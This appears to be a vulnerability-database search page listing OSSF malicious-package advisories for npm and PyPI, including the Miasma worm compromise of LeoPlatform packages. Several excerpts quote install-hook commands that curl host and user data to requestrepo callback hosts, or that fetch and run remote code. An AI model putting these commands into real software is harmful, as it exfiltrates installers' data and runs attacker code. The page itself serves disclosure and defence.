Lucene search
K

226511 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.7 views

Malicious code in solo-nav (npm)

The solo-nav npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.3AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.12 views

Malicious code in leo-auth (npm)

The leo-auth npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.5AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.10 views

Malicious code in leo-config (npm)

The leo-config npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.9 views

Malicious code in serverless-convention (npm)

The serverless-convention npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

6.2AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.7 views

Malicious code in leo-cache (npm)

The leo-cache npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.4AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.13 views

Malicious code in leo-sdk (npm)

The leo-sdk npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.2AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.7 views

Malicious code in leo-connector-mongo (npm)

The leo-connector-mongo npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

6.1AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.6 views

Malicious code in leo-connector-elasticsearch (npm)

The leo-connector-elasticsearch npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.8 views

Malicious code in serverless-leo (npm)

The serverless-leo npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.7 views

Malicious code in rstreams-metrics (npm)

The rstreams-metrics npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.2AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.6 views

Malicious code in leo-connector-oracle (npm)

The leo-connector-oracle npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.8 views

Malicious code in rstreams-shard-util (npm)

The rstreams-shard-util npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

6.1AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.20 views

Malicious code in leo-streams (npm)

The leo-streams npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.8 views

Malicious code in leo-aws (npm)

The leo-aws npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.3AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.5 views

Malicious code in leo-cli (npm)

The leo-cli npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.2AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.11 views

Malicious code in leo-logger (npm)

The leo-logger npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.1AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.12 views

Malicious code in leo-connector-mysql (npm)

The leo-connector-mysql npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.12 views

Malicious code in leo-cdk-lib (npm)

The leo-cdk-lib npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.8 views

Malicious code in leo-connector-redshift (npm)

The leo-connector-redshift npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.10 views

Malicious code in leo-cron (npm)

The leo-cron npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:18 p.m.5 views

Malicious code in syco1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e43be65a0930b121cf4d610c70b2d07165e4d335dece4344590b471d078fa5b5 Package self-describes as a 'System binary configuration tool' but ships a covert screen and clipboard surveillance overlay. pointer.py captures...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:18 p.m.7 views

Malicious code in syspo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f89c590b7c90182cb86bc3e45f71f2357003f4359b6e94818fc996951762f5c The package is published as a 'System binary configuration tool' but its actual behavior is a covert clipboard/screen-capture overlay. On invocation...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:18 p.m.5 views

Malicious code in sypoi1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b22a9450e70ba1095097d2779ad6da01c111c37e940d890fbfc21d1aeb6a0f11 On require, index.js silently bootstraps a full Python runtime on the installer's machine — first via winget install -e --id Python.Python.3.12...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 9:32 p.m.4 views

Malicious code in @kl-dolphin/jump (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 01bcfe49a6a65949559f89cc5019c6e9ec59a236183f7cb8d1906d1e3caccf7d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:16 p.m.4 views

Malicious code in @kl-dolphin/swim (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 799f1e9f18de306eaf0e84079501a9b01d2d1d1085ac9f119fa8e047b43a90ac Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:5 p.m.4 views

Malicious code in zenith-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c29676376a28531b186e09fbf7e2d3a0697943ece764e0604ebbdd4b734ae094 Package name is zenith-utils but the tarball is a verbatim copy of the nodemailer source tree lib/nodemailer.js as main, lib/smtp-transport,...

6.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 4:27 p.m.4 views

Malicious code in python-dateutil2 (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 fbd1a31a38c7a6487545ce3e039371443c9ac80c7dc0ff9b22a46db6686244b2 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:31 p.m.7 views

Malicious code in normalize-plus (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675 On import, normalize-plus's top-level initPlugin performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:43 p.m.5 views

Malicious code in ui-core-system (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 5354cae05d6dc20a942310d00c7ae19f0cef2e44c9922322a81a950fdd798c6b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:8 p.m.7 views

Malicious code in ldapaotest (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e6acf213c67fc31df0f21bf872b8c8592ebc5e5af55e79884a483fad6a7ad8c4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:7 p.m.4 views

Malicious code in cccmyssr2 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03 On npm install, the package's postinstall.js executes curl "http://r1x55270.requestrepo.com/pre?h=$hostname&u=$whoami", transmitting the installer's...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:7 p.m.5 views

Malicious code in cccmyssr-util (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7 On npm install, the package's postinstall.js unconditionally executes exec'curl http://qvmjcw4s.requestrepo.com', sending an HTTP callback to a uniqu...

6.3AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:7 p.m.7 views

Malicious code in cccmyssr3 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a15e77975be346fa9b834e50124784a6774b5385e47072ae80911f5eda92cabf On npm install, this package automatically runs postinstall.js, which executes curl -X POST with a body containing the installer's hostname $hostname...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:6 p.m.4 views

Malicious code in react-campaign-optimizer (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a040ca9a32fe68e08906bdc58b7ae907b8f8092acd9764266de15004b3922e9f On npm install, the package runs node postinstall.js declared in package.json scripts.postinstall which performs unauthenticated, unconsented...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:5 p.m.11 views

Malicious code in signup-embedder (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c48f398f700b78d1893db4570d5d6f16985d937ee79677aab97e673a1cf86e7e [email protected] ships preinstall.js and postinstall.js lifecycle scripts that auto-execute on npm install. preinstall.js collects...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:4 p.m.6 views

Malicious code in chai-as-predicted (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd7a2ff71dd341d02986c8185ea9eb18196b782f0efd9103859c0493c9f4cc78 Package name 'chai-as-predicted' impersonates the popular 'chai-as-promised' assertion library, but ships unrelated code disguised as pino logger...

6.2AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:1 p.m.6 views

Malicious code in hs-locale-management (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d717c264a1c338c3b3fee43c13e43eba24cafbdabf34f62108bbd99e05c6b1b Package targets the internal-sounding name 'hs-locale-management' on the public npm registry at an inflated version 99.99.99-poc3, the canonical...

6.3AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:23 a.m.6 views

Malicious code in multer-express (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b2776e1ead8f0a089fc302abdc832c78c30a0add00952fb3071c904a3fcbc150 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:23 a.m.4 views

Malicious code in rapidsearch (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 523ca6ccaf1ecde4d8e9d093519fcea846342f3108a5dd4e5ab79ae65144167e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:16 a.m.4 views

Malicious code in eth_accounts (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7049409317d7ca15ed0af4f42194769b5383eaaa676af744d96f6c2158c7e676 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:16 a.m.4 views

Malicious code in vercel-api-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 098c831fa62673ea33d1d0459bb4b529b33801f3a26b6691e7c2cd6597723952 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:16 a.m.9 views

Malicious code in evmdotjs (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2593392b2cb94ce2e63327e486ec5c1a2a738c76283c6b1958aa2b23a1cc7b0f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 7:35 a.m.6 views

Malicious code in simplisafe-gatsby (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 564baff2e47527f159c52c527e1ea2b93d73625f94737f4397cff99311871a18 On npm install, the package's preinstall hook package.json declares "preinstall": "node index.js" executes index.js, which collects the installer's...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 7:21 a.m.6 views

Malicious code in macos-ci-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8f342b002e02396d7f82ee89e77140204c35b673411afd05bc1b3ca91c895a06 On first require of the package, index.js decodes a base64-encoded URL https://api.ingress-hub.com/cdn/assets/update.pkg and downloads the response t...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 7:21 a.m.6 views

Malicious code in linux-ci-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8b2c5010ed5043c947b561f4359869ec7c0f6cdf219d0b2aa35c039e36812a01 On require, index.js performs a Linux platform check, then decodes a base64-obfuscated URL https://api.ingress-hub.com/cdn/assets/update.pkg and...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:58 a.m.5 views

Malicious code in system-core-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0a1d575b5be4daa71ffea6c37e5990b0396f864234cb5f0488c11332cdd7e4d3 On require/import, src/index.js shell-executes a hidden PowerShell one-liner that downloads launcher.bat from an anonymous Cloudflare R2 bucket...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:41 a.m.7 views

Malicious code in gunicorm (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c97ab7b686dad57c3e1ffd4b86d6a75470164ed15ceedc2b26a4847fb2a331ab Package name gunicorm is a single-character edit of the widely-used gunicorn WSGI server and ships no functional code beyond setup.py. setup.py...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:41 a.m.5 views

Malicious code in ditenv (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb setup.py overrides the install and egginfo commands with a RunCommand class that fires unconditionally on pip install or pip download. The override...

6.2AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:40 a.m.7 views

Malicious code in fkaks (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e44e1f1158eda01d3f18e3a3c01e30ebc9f8f92780ea532a63cf6ed31d8a25d3 fkaks 0.0.1 ships a setup.py that overrides the install and egginfo commands so that any pip install or pip download of the package unconditionally...

6.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:39 a.m.7 views

Malicious code in mcpsever (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 087fec121d53b905e66a2c368e905de51bc7aa3863f0777589a18d45623d3515 During installation, the package exfiltrates env variables --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign:...

6AI score
Exploits0References1
Total number of security vulnerabilities226511